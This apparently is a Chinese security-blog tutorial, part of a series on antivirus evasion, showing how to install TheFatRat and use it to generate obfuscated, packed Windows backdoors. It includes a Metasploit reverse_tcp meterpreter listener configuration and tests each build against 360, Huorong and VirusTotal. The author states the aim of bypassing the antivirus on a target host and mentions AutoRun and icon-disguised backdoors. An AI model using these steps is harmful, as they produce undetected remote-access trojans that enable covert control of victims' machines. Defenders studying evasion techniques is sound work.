远控免杀专题(10)-TheFatRat免杀(VT免杀率22/70)
本专题文章导航
1、远控免杀专题(1)-基础篇:https://mp.weixin.qq.com/s/3LZ_cj2gDC1bQATxqBfweg
2、远控免杀专题(2)-msfvenom隐藏的参数:https://mp.weixin.qq.com/s/1r0iakLpnLrjCrOp2gT10w
3、远控免杀专题(3)-msf自带免杀(VT免杀率35/69):https://mp.weixin.qq.com/s/A0CZslLhCLOK_HgkHGcpEA
4、远控免杀专题(4)-Evasion模块(VT免杀率12/71):https://mp.weixin.qq.com/s/YnnCM7W20xScv52k_ubxYQ
5、远控免杀专题(5)-Veil免杀(VT免杀率23/71):https://mp.weixin.qq.com/s/-PHVIAQVyU8QIpHwcpN4yw
6、远控免杀专题(6)-Venom免杀(VT免杀率11/71):https://mp.weixin.qq.com/s/CbfxupSWEPB86tBZsmxNCQ
7、远控免杀专题(7)-Shellter免杀(VT免杀率7/69):https://mp.weixin.qq.com/s/ASnldn6nk68D4bwkfYm3Gg
8、远控免杀专题(8)-BackDoor-Factory免杀(VT免杀率13/71):https://mp.weixin.qq.com/s/A30JHhXhwe45xV7hv8jvVQ
9、远控免杀专题(9)-Avet免杀(VT免杀率14/71):https://mp.weixin.qq.com/s/EIfqAbMC8HoC6xcZP9SXpA
10、远控免杀专题(10)-TheFatRat免杀(VT免杀率22/70):本文
文章打包下载及相关软件下载:https://github.com/TideSec/BypassAntiVirus
免杀能力一览表
几点说明:
1、上表中标识 √ 说明相应杀毒软件未检测出病毒,也就是代表了Bypass。
2、为了更好的对比效果,大部分测试payload均使用msf的windows/meterperter/reverse_tcp
模块生成。
3、由于本机测试时只是安装了360全家桶和火绒,所以默认情况下360和火绒杀毒情况指的是静态+动态查杀。360杀毒版本5.0.0.8160
(2020.01.01),火绒版本5.0.34.16
(2020.01.01),360安全卫士12.0.0.2002
(2020.01.01)。
4、其他杀软的检测指标是在virustotal.com
(简称VT)上在线查杀,所以可能只是代表了静态查杀能力,数据仅供参考,不足以作为免杀的精确判断指标。
5、完全不必要苛求一种免杀技术能bypass所有杀软,这样的技术肯定是有的,只是没被公开,一旦公开第二天就能被杀了,其实我们只要能bypass目标主机上的杀软就足够了。
一、TheFatRat介绍
TheFatRat创建的后门或者payload,可以在Linux,Windows,Mac和Android上等多种平台上执行,可生成exe、apk、sh、bat、py等多种格式。TheFatRat可以和msf无缝对接,并且集成内置了Fudwin、Avoid、backdoor-factory等多个免杀工具,对powershell的免杀姿势尤其多样。
二、安装TheFatRat
推荐使用linux操作系统,如Kali、Parrot、Dracos、BackTrack、Backbox等。
1、Github安装
安装比较简单,首先从github上clone下来
git clone https://github.com/Screetsec/TheFatRat
然后进入TheFatRat
目录
cd TheFatRat
执行安装命令
chmod +x setup.sh && ./setup.sh
在成功安装后,可以查看TheFatRat/logs
目录下的setup.log
文件,里面是TheFatRat
需要的一些软件和环境。
2、软件升级
作者提供了升级的命令,可直接升级软件
./update && chmod + x setup.sh && ./setup.sh
三、TheFatRat使用说明
在安装完成后,使用命令fatrat
即可执行,启动略慢。TheFatRat和专题9里的Avet一样,也默认不允许远程连接后执行,只能在linux主机内执行。
运行时会检测一些软件或环境是否已经安装
同时还会有个界面提醒大家不要把生成的后门上传到virustotal.com
上面,可以上传到nodistribute.com
(专门试了下,但上传样本一直不成功)。
之后就能看到启动后的界面了
常用创建后门菜单如下,我自己翻译解释了一下,有个别可能不太准确。
[01] Create Backdoor with msfvenom
#01:直接利用msf来生产后门,基本不能免杀
[02] Create Fud 100% Backdoor with Fudwin 1.0
#02:使用Fudwin 1.0创建powershell后门,ps1利用powerstager混淆,从结果来看效果不错
[03] Create Fud Backdoor with Avoid v1.2
# 03: 使用Avoid v1.2创建后门
[04] Create Fud Backdoor with backdoor-factory [embed]
#04:使用backdoor-factory创建后门
[05] Backdooring Original apk [Instagram, Line,etc]
#05:生成安卓使用的apk后门
[06] Create Fud Backdoor 1000% with PwnWinds [Excelent]
#06:综合了多种方式,可生成bat、exe、dll、ps1等,可利用c、C#多种语言编译,官方非常推荐,但经尝试免杀效果一般,肯定是被杀软列入特征库了
[07] Create Backdoor For Office with Microsploit
#07:生成office类后门
[08] Trojan Debian Package For Remote Access [Trodebi]
#08:生成linux后门
由于01是直接调用了msfvenom生成payload,只不过稍微进行了多个msfvenom编码,免杀效果肯定一般。
[01] Create Backdoor with msfvenom
生成过程如下:
我这里就直接使用官方推荐的2和6进行测试了。
四、使用TheFatRat生成ps1-exe(VT免杀率22/70)
在主菜单选择2,进入[02] Create Fud 100% Backdoor with Fudwin 1.0
,选择1,利用powerstager混淆,并将powershell编译成exe。
在生成过程中可能会报错,如下所示
这个时候需要去查看TheFatRat/logs
目录下的fudwin.log
文件,看看什么报错信息。
我的第一次报错是因为python没有安装named包,第二次报错是因为输入的文件名没有写后缀,这里特别注意,必须写后缀,不然会报错。
这样就生成成功了。
在我本地机器上监听3333端口
use exploit/multi/handler
set PAYLOAD windows/x64/meterpreter/reverse_tcp
set LHOST 10.211.55.2
set LPORT 3333
exploit -j
在测试机器上执行payload13.exe
虽然报错,但可正常上线。
打开杀软进行测试,虽然火绒静态查杀没查出来,不过行为检测查杀到了。360静态和动态都能查杀。(病毒库均已更新到2020.01.01)
virustotal.com中22/70个报毒
五、使用TheFatRat生成加壳exe(VT免杀率12/70)
在主菜单选择2,进入[02] Create Fud 100% Backdoor with Fudwin 1.0
,选择2,slow but powerfull
(慢但是有效)
输入监听ip和端口后,可能会报错,也可能解密界面都消失,但其实后台还在运行.
看免杀过程,应该是msfvenom一定编码后进行upx加壳,可能还有其他处理,想了解详细过程的可以看下源码。
等一段时间后,在/root/Fatrat_Generated/
目录下会发现生成了Powerfull.exe
和Powerfull-fud.exe
。
在测试机器运行,火绒静态动态都可查杀,可正常上线
360动态和静态都没有反应
virustotal.com中12/70个报毒
六、使用TheFatRat编译C#+powershell生成exe(VT免杀率37/71)
尝试官方比较推荐的第6种方式[06] Create Fud Backdoor 1000% with PwnWinds [Excelent]
,进入后菜单如下,我选择2使用c#+powershell来生成exe
配置好ip和端口,选择好监听payload
生成成功
可正常上线
打开杀软,静态检测没问题,但行为检测时360和火绒都报预警了。
virustotal.com中37/71个报毒
之后也尝试了下生成bat和dll文件,免杀率大约在18/58和22/65。
四、小结
TheFatRat创建的后门格式和支持的平台比较多样化,而且还支持生成CDROM/U盘中能自动运行(生成AutoRun文件)的后门文件,并且可以对payload更改图标,具有一定伪装效果。
TheFatRat的很多免杀方式是借助于msfvenom编码、upx等加壳压缩、c/c#编译等将powershell混淆后编译成exe或bat文件,但有些在执行时还是会调用powershell,而powershell的调用已经被各大杀软盯的很紧了,所以查杀效果只能算是一般了。
由于使用TheFatRat生成了多种payload,免杀效果各不相同,我就选了个折中一些的22/70作为TheFatRat的免杀代表。
五、参考资料
TheFatRat 一款简易后门工具:https://www.zhuanzhi.ai/document/22f6e03336336de7f211ac7b97c2fb0f
TheFatRat – 跨平台反弹后门Shell生成神器:http://caidaome.com/?post=198
扫描下方二维码学习更多WEB安全知识:
Ms08067安全实验室
专注于普及网络安全知识。团队已出版《Web安全攻防:渗透测试实战指南》,《内网安全攻防:渗透测试实战指南》,目前在编Python渗透测试,JAVA代码审计和二进制逆向方面的书籍。
团队公众号定期分享关于CTF靶场、内网渗透、APT方面技术干货,从零开始、以实战落地为主,致力于做一个实用的干货分享型公众号。
官方网站:www.ms08067.com
远控免杀专题(10)-TheFatRat免杀(VT免杀率22/70)相关推荐
- 远控免杀专题(29)-C#加载shellcode免杀-5种方式(VT免杀率8-70)
0x00 免杀能力一览表 几点说明: 1.表中标识 √ 说明相应杀毒软件未检测出病毒,也就是代表了Bypass. 2.为了更好的对比效果,大部分测试payload均使用msf的windows/mete ...
- RayLink远控软件又推出2个重磅宝藏功能免费用
你有没有在远程办公时,担心他人偷窥电脑?以致于保密性资料或私密信息,遭到泄露.创意被剽窃...... 又或是遇到过邻座同事屏幕前明明没人,鼠标箭头却自个浏览起网页的惊悚画面? 如果你有上述情况,可以试 ...
- 远控免杀专题(16)-Unicorn免杀(VT免杀率29/56)
声明:文中所涉及的技术.思路和工具仅供以安全为目的的学习交流使用,任何人不得将其用于非法用途以及盈利等目的,否则后果自行承担! 本专题文章导航 1.远控免杀专题(1)-基础篇:https://mp.w ...
- 远控免杀专题(12)-Green-Hat-Suite免杀(VT免杀率23/70)
声明:文中所涉及的技术.思路和工具仅供以安全为目的的学习交流使用,任何人不得将其用于非法用途以及盈利等目的,否则后果自行承担! 本专题文章导航 1.远控免杀专题(1)-基础篇:https://mp.w ...
- 远控免杀专题(17)-Python-Rootkit免杀(VT免杀率7/69)
声明:文中所涉及的技术.思路和工具仅供以安全为目的的学习交流使用,任何人不得将其用于非法用途以及盈利等目的,否则后果自行承担! 本专题文章导航 1.远控免杀专题(1)-基础篇:https://mp.w ...
- 远控免杀专题(13)-zirikatu免杀(VT免杀率39/71)
声明:文中所涉及的技术.思路和工具仅供以安全为目的的学习交流使用,任何人不得将其用于非法用途以及盈利等目的,否则后果自行承担! 本专题文章导航 1.远控免杀专题(1)-基础篇:https://mp.w ...
- 远控免杀从入门到实践(3)-代码篇-C/C++
郑重声明:文中所涉及的技术.思路和工具仅供以安全为目的的学习交流使用,任何人不得将其用于非法用途以及盈利等目的,否则后果自行承担! <远控免杀从入门到实践>系列文章目录: 1.远控免杀从 ...
- 远控免杀专题文章(3)-msf自免杀(VT免杀率35/69)
原文链接:远控免杀专题文章(3)-msf自免杀(VT免杀率35/69) 免杀能力一览表 几点说明: 1.上面表中标识 √ 说明相应杀毒软件未检测出病毒,也就是代表了Bypass. 2.为了更好的对比效 ...
- 远控免杀专题(67)-白名单(113个)总结篇
关于白名单程序 相信大家对白名单程序利用的手法也已经非常熟悉了,白名单程序利用其实是起源于LOLBins,全称"Living-Off-the-Land Binaries",直白翻译 ...
- 远控免杀专题文章(2)-msfvenom隐藏的参数
本专题文章导航 1.远控免杀专题文章(1)-基础篇: 远控免杀专题文章(1)-基础篇 因为cobaltstrike生成payload比较简单,这里不再累述,只是介绍一下msfvenom的基本参数和一些 ...
最新文章
- 重磅直播|光学3D测量技术原理及应用
- angular-ng-repeat不允许collection中存在两个相同Id的对象
- Vcastr 3.0 - flash video(flv) player (开源 Open Source)
- Bundle数据传输
- ubuntu16.04 + ros-kinetic 配置cartographer
- JS new操作符执行之后背后的操作
- 基于Cisco CDP协议的家用路由器以及盒子的自动配置随想
- 微信小程序 首页弹出用户协议
- 服务器网卡支持25G,25G服务器网卡光模块解决方案
- RN实现手机摇一摇功能
- cad导出pdf_如何使用CAD手机看图软件将DWG格式图纸文件转换成PDF格式?
- Android 动态分区详解(六) 动态分区的底层机制
- java 三边求面积_已知三角形的三边长如何求面积?
- 一个很有趣的问题:那些用QQ邮箱发应聘邮件的人啊(附:怎样写一封得体的电子邮件)...
- OAuth认证(完整版)
- webview漏洞 -转
- 装机员Ghost Win8.1 64位装机8月版
- python中write函数_第9.7节 Python使用write函数写入文件内容
- 【数据分析进阶】DCIC竞赛-task1 数据读取
- mac下用browser-sync 做一个webapp的手机端的测试
热门文章
- virtuoso配合calibre进行电路后仿真
- SpringMVC文件下载IOException: UT010029: Stream is closed
- ubuntu oracle 工具,ubuntu上安装Oracle InstantClient
- 国科大学习资料--矩阵分析与应用(李保滨)--2016年期末考试试卷
- C语言实现通讯录制作-链表学习案例(C/C++)
- Microsoft Windows XP Embedded 技术常见问题
- centos7字体颜色改变_CentOS7.3中设置Shell终端文本外观自定义字体
- python activex_如何在python中使用ActiveX控件
- OpenCore引导配置说明第十五版-基于OpenCore-0.6.8-04-06正式版
- c语言炒股软件公式,股票软件怎么使用指标选股公式